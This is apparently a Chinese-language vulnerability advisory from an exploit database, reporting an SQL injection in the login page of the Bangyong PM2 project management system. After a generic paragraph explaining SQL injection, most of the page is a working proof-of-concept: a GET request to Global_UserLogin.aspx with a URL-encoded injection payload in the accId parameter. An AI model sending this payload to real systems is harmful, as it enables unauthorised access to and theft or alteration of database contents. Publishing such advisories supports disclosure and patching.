邦永PM2项目管理系统 Global_UserLogin.aspx SQL注入漏洞

日期: 2024-06-03 | 影响软件: 邦永PM2项目管理系统 | POC: 已公开

漏洞描述

SQL注入漏洞是指攻击者通过在Web应用程序的输入字段中插入恶意SQL代码,从而绕过应用程序的安全措施,直接对数据库执行非法操作。这种漏洞通常发生在应用程序未对用户输入进行充分验证和过滤的情况下,使得攻击者能够获取、修改或删除数据库中的数据,甚至可能执行服务器上的任意代码。

PoC代码

GET /Global/Global_UserLogin.aspx?accId=1%27%2B%28SELECT%20CHAR%2888%29%2BCHAR%28110%29%2BCHAR%28115%29%2BCHAR%2880%29%20WHERE%202116%3D2116%20AND%201824%20IN%20%28SELECT%20%28CHAR%28113%29%2BCHAR%28107%29%2BCHAR%28122%29%2BCHAR%28118%29%2BCHAR%28113%29%2B%28SELECT%20%28CASE%20WHEN%20%28SYSDATETIME%28%29%3DSYSDATETIME%28%29%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%28113%29%2BCHAR%2898%29%2BCHAR%28112%29%2BCHAR%28120%29%2BCHAR%28113%29%29%29%29%2B%27&loginCode=&password=&type= HTTP/1.1

相关漏洞推荐